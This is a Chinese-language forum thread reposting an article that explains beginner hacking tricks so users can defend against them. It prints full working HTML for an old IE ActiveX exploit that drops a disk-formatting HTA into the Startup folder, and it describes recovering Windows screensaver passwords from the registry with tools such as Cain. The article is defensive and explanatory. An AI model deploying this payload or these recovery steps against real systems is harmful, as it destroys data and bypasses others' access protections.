發新話題

『轉貼』揭穿入門駭客所使用的技倆

『轉貼』揭穿入門駭客所使用的技倆

前言

這幾年台灣網路、坊間書局,陸續都出現一些打著「駭客」名號,內容深度卻大概和「軟體使用手冊」差不多等級的駭客文章資訊,這些資訊著眼在「簡單」、「速食」,強調你不用懂得太多,只需要會用「滑鼠」和「鍵盤」,你就可以變成「駭客」成功入侵別人的電腦系統。

所有這類所謂的「駭客」資訊都有一個特點,那就是駭客入侵的想法與原理講的很少(大概跟「麥克喬丹」頭上的頭髮一樣少),而入侵的步驟與過程講的卻很多,看起來很像是一本「駭客入侵Office使用手冊」或是「駭客入侵遊戲攻略」一般。

大量這樣資訊充斥的結果,使得台灣如雨後春筍般冒出一堆的入門駭客,這些入門駭客都有一個相同之處︰「他們只會和書內完全相同的入侵步驟,換個不同環境,他們就沒有入侵的能力」。

我常常收到或在某些網站上看到類似的訊息:「請寄給我防毒軟體查不到的木馬」或是「我照著某某步驟入侵,但是卻沒有出現和書中相同的結果」-在台灣「駭客」原來是入侵軟體操作員的代名詞,真是令人唏噓!

英文對這類只會照本宣科的駭客,一般統稱為「Script Kid」,意思就是「只會跟著照做的小孩子」,壓跟談不上什麼駭客。

其實說實話,藉由這類速成駭客資訊,沒錯,你是可以在短時間學到一些入侵的技倆,可以速成,但是相對來說,被入侵者也可以在短時間內學到「防禦」的方法,只要他們知道有關入門駭客所使用的入侵步驟,他們可以在10分鐘內將這些入侵管道全部堵住,使得入門駭客完全無法入侵成功….因為他們是「只會跟著照做的小孩子」。

有網友問我:「我想有蠻多人有個問題,如果我平常是只會使用98之類作業系統的普通上網族,要怎樣『盡量做到』讓自己上網安全一點,而不會太恐懼駭客呢….」

其實對這個問題的答案:「只要你稍微懂有關這些入門駭客的技倆,你大概就可以上網不被不被他們入侵….」

所以在接下來的系列文章,我將一一揭穿這些入門駭客所使用的「小孩子」技倆,只要你知道他們的入侵步驟,我想有關這類簡單到你不屑使用的入侵管道,你都可以在10分鐘內全部防堵。

TOP

無聊至極的「格式化網頁」攻擊

格式化網頁是什麼

■ 入侵難易度:*
■ 入侵成功率:10%以下
■ 入侵者等級:「變態」的小孩子


所謂的格式化網頁攻擊,就是當你瀏覽網路上某個網站的網頁之後,當電腦重開機,你會發現硬碟竟然被格式化,或者是Windows系統下的重要檔案被刪除,使得電腦無法正常運作,它的入侵過程如下:

步驟一

當你不小心瀏覽到某個「變態」無聊設計的格式化網頁時。


(圖1-1-1)

步驟二

這個格式化網頁會在你電腦「啟動」資料夾下放入一個類似「Format.hta」的執行檔,而執行檔內就是執行格式化磁碟的指令。


(圖1-1-2)

步驟三

當你系統重開機之後。


(圖1-1-3)

步驟四

我們知道放在「啟動」資料夾下的檔案會被Windows系統自動執行,所以這個「Format.hta」檔案會在Windows系統開機時就執行到,使得你電腦被「變態」格式化掉。


(圖1-1-4)

TOP

1-2格式化網頁的運作原理

讓我們先來看看格式化網頁內的HTML語法:
引用:
<object classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" id="format">
</object>

<script>

format.Reset();

format.Path="C:\\windows\\Start Menu\\Programs\\啟動\\Format.hta";

format.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert('注意!即將格式化你的 A: 磁碟機');wsh.Run('start /m format a: /q /autotest /u');</"+"SCRIPT>";

format.write();

</script>

<html>

<head>

<title></title>

</head>

<body>

<p align="center"><big><strong>格式化網頁範例</strong></big></p>

<hr>

<p align="center">注意當你瀏覽完此網頁之後,你電腦系統的「啟動」資料夾下會被放入一個「Format.hta」的檔案,使得你重開機後「A:」磁碟機內的磁片會被格式化!</p>

<hr>

<p><a href="../../Start%20Menu/Programs/啟動">檢視你電腦的「啟動」資料夾....</a></p>

</body>

</html>
其中比較值得注意的一段是有關ActiveX控制元件的應用部份,如下所示:
引用:
<object classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" id="format">
</object>

<script>

format.Reset();

format.Path="C:\\windows\\Start Menu\\Programs\\啟動\\Format.hta";

format.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert('注意!即將格式化你的 A: 磁碟機');wsh.Run('start /m format a: /q /autotest /u');</"+"SCRIPT>";

format.write();

</script>
我們Windows系統發生安全問題最主要的地方在於這個編號「06290BD5-48AA-11D2-8432-006008C3FBFC」的ActiveX元件,這個元件是屬於Scriptlet.TypeLib(檔案SCROBJ.DLL)所有,它的功能是提供程式構建類別函示庫用的(Object for constructing type libraries for scriptlets),不過因為設計上的問題,使得入侵者可以透過它在使用者電腦內「建立檔案、寫入資料」。


(圖1-2-1)

因此「變態」的入門駭客發現這個漏洞,於是在網頁內先宣告建立這個Scriptlet.TypeLib物件:

<object classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" id="format"></object>

然後透過它在你電腦內的「啟動」資料夾建立一個「Format.hta」檔案(C:\windows\Start Menu\Programs\啟動\Format.hta)

format.Path="C:\\windows\\Start Menu\\Programs\\啟動\\Format.hta";

接著利用透過調用WSH(Windows Script Host)物件(ActiveX編號「F935DC22-1CF0-11D0-ADB9-00C04FD58A0B」)的方法,把有關格式化磁碟的指令(start /m format a: /q /autotest /u)透過WSH物件內的Run函示來執行(wsh.Run('start /m format a: /q /autotest /u),最後把整個內容寫入到「啟動」資料夾內的這個「Format.hta」檔案內:

format.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert('注意!即將格式化你的 A: 磁碟機');wsh.Run('start /m format a: /q /autotest /u');</"+"SCRIPT>";


(圖1-2-2)

整個格式化網頁的原理流程圖如下:


(圖1-2-3)

我在書店(哪本書不提了)及網站上,看到有人把格式化網頁的漏洞原理解釋為以下這段程式碼:
引用:
<script>
format.Reset();

format.Path="C:\\windows\\Start Menu\\Programs\\啟動\\Format.hta";

format.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert('注意!即將格式化你的 A: 磁碟機');wsh.Run('start /m format a: /q /autotest /u');</"+"SCRIPT>";

format.write();

</script>
這實在是天大的錯誤,實際上出問題的應該是以下程式碼才對
引用:
<object classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" id="format">
</object>
因為編號「06290BD5-48AA-11D2-8432-006008C3FBFC」的ActiveX元件有漏洞,所以我們調用它可以讓你將惡意程式指令寫入到使用者的電腦,而不是因為WSH物件可以執行指令的問題。

有關格式化網頁的原理及出處,各位可以去Georgi Guninski的安全研究網站看到詳細資料,網址:「訪客無法瀏覽此圖片或連結,請先 註冊登入會員


(圖1-2-4)

TOP

1-3輕鬆10分鐘防堵法

這個格式化網頁攻擊法,其實講實話對現在使用者大部分的機器都無法作用,因為只要你的IE在5.01 SP1、IE 5.5 SP1、IE 6.0以後的版本,在執行到這類的惡意格式化網頁時,都會出現如圖的錯誤畫面,所以不會讓你被入侵攻擊:


(圖1-3-1)


(圖1-3-2


可是對於有些從不更新IE版本的初學者,還是有聽到傳出瀏覽網頁後被格式化的災情,所以這裡介紹兩個快速、輕鬆防堵格式化網頁的方法:

1.當然將你的IE立刻升級到最新版本,這樣就可以防堵這個格式化網頁的漏洞。

2.將Windows「啟動」資料夾更改預設位置。我們知道Windows系統是將「啟動」資料夾安裝後預定在「C:\windows\Start Menu\Programs\啟動」這個位置,所以入門駭客他們也「不加思考」將格式化磁碟指令寫入到這個位置底下,所以像筆者將「啟動」資料夾設定在「C:\windows\Start Menu\Programs\啟動-1」資料夾下面,這樣入門駭客他們照本宣科的入侵步驟就對我沒輒,管他們在我的「C:\windows\Start Menu\Programs\啟動」資料夾下寫什麼東西,對不起….我開機後執行的是這個「C:\windows\Start Menu\Programs\啟動-1」資料夾下的東西,你們那些小孩子入侵法,我只要稍微「動點腦筋」就可以輕鬆防堵住了。(我知道這個防堵法有點拙、有點蠢…但對付小孩子,你不覺得這很有用嗎)


(圖1-3-3)

而要如何更改你系統預設「啟動」資料夾的位置,你可以啟動Windows的登錄編輯器(regedit),然後更改這個機碼

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]

裡面的「Startup」數值,就可以改變你「啟動」資料夾的位置了。



(圖1-3-4)

TOP

破解螢幕保護程式的密碼

破解原理

我們知道當你在Windows系統裡面啟動「螢幕保護裝置」時,你可以設定「密碼保護」功能,這樣在結束螢幕保護程式時必須輸入正確的密碼,你才可以回到Windows系統裡面。


(圖2-1-1:設定「密碼保護」功能)


(圖2-1-2:要關閉螢幕保護程式必須輸入正確的密碼才能回到Windows系統)


可是Windows系統儲存螢幕保護程式密碼的方法有點笨,因為它是把密碼存到Windows系統的Registry登錄檔內,你可以開啟Windows系統regedit程式,然後鍵入「ScreenSave_Data」字串來搜尋裡面的資料。


(圖2-1-3)

而搜尋到「ScreenSave_Data」字串位置所記錄的數值,就是螢幕保護程式設定的密碼…當然這段密碼是經過編碼後的資料,所以你只要將資料正確解碼,就可以還原原先的密碼內容。


(圖2-1-4)

不過講真的這系列文章我既然定位在「入門駭客」的階層,我想這些入門駭客的小孩子們,對於去了解Windows螢幕保護程式的編碼規則,他們大概是毫無興趣,所以有關密碼編碼規則的細節部份,我就不多加說明,你真有興趣想知道的讀者,這裡建議你可以去讀「Hacking Truths」網站內的一篇文章,你可以從裡面知道還原密碼的演算法。

文章:Cracking the Windows Screen Saver Password
網址:訪客無法瀏覽此圖片或連結,請先 註冊登入會員


(圖2-1-5)

而對於小孩子駭客而言,我想能夠直接利用「工具」將螢幕保護程式的密碼解開就夠了,他們才不想知道該工具後面的設計原理勒!

所以這裡先介紹一個專門破解螢幕保護程式密碼的工具:

工具:Screen Saver Password Decrypter
網址:訪客無法瀏覽此圖片或連結,請先 註冊登入會員


(圖2-1-6)

這個程式非常小巧,不需要安裝,你直接執行下載回來壓縮檔內的執行檔就可以啟動程式。當程式執行之後,首先在「Encrypted Password」欄位輸入剛剛前面查到「ScreenSave_Data」欄位所記錄的編碼資料(或者你可以直接按下「Get it」按鈕讓程式自動幫你取得),然後按下「Decrypted it」按鈕,你就可以看到密碼還原後的內容,原來還原後密碼是「123」(79dc45→123)。



(圖2-1-7)

TOP

2-2-2 Cain程式介紹

其實真要講起破解Windows系統密碼的工具,我想大部分的入門駭客應該都會推薦Cain這套程式才對。


(圖2-1-8)

Cain這套程式可是專門設計用來「找回密碼」(Password Recover Tool),所以舉凡像「螢幕保護程式密碼」、「*號隱藏密碼」、「撥接帳號密碼」….等等,你都可以用Cain工具將它找回來,各位可以去以下網站下載取得Cain這套程式,記住程式對於Winodws 9X(ME)和Windows NT/2000/XP有不同的程式版本。

網站:訪客無法瀏覽此圖片或連結,請先 註冊登入會員
下載:Windows 9x版- 訪客無法瀏覽此圖片或連結,請先 註冊登入會員
            Windows NT/2000/XP-訪客無法瀏覽此圖片或連結,請先 註冊登入會員


(圖2-1-9)

而使用Cain破解螢幕保護程式的方法很簡單,首先執行下載回來的檔案將Cain程式安裝到系統內,然後執行它,在程式主視窗按下「Screen Saver Password」按鈕,你就可以看到系統的螢幕保護程式密碼,夠簡單了吧!



(圖2-1-10)

TOP

謝謝分享~
但一班的只能稱為腳本小子~稱不了駭客

一般使用的也只是木馬或其他遠端程式關掉幾個連接口

或下載防火牆幾乎就檔了一大半~當然還是要減少好奇心才好~

個人觀念~

TOP

夠專業! 雖簡單的駭客入侵做法,'不過也能讓電腦初學者受到傷害。

TOP

~真是個好東西~謝謝啦~

TOP

發新話題

本站所有圖文均屬網友發表,僅代表作者的觀點與本站無關,如有侵權請通知版主會盡快刪除。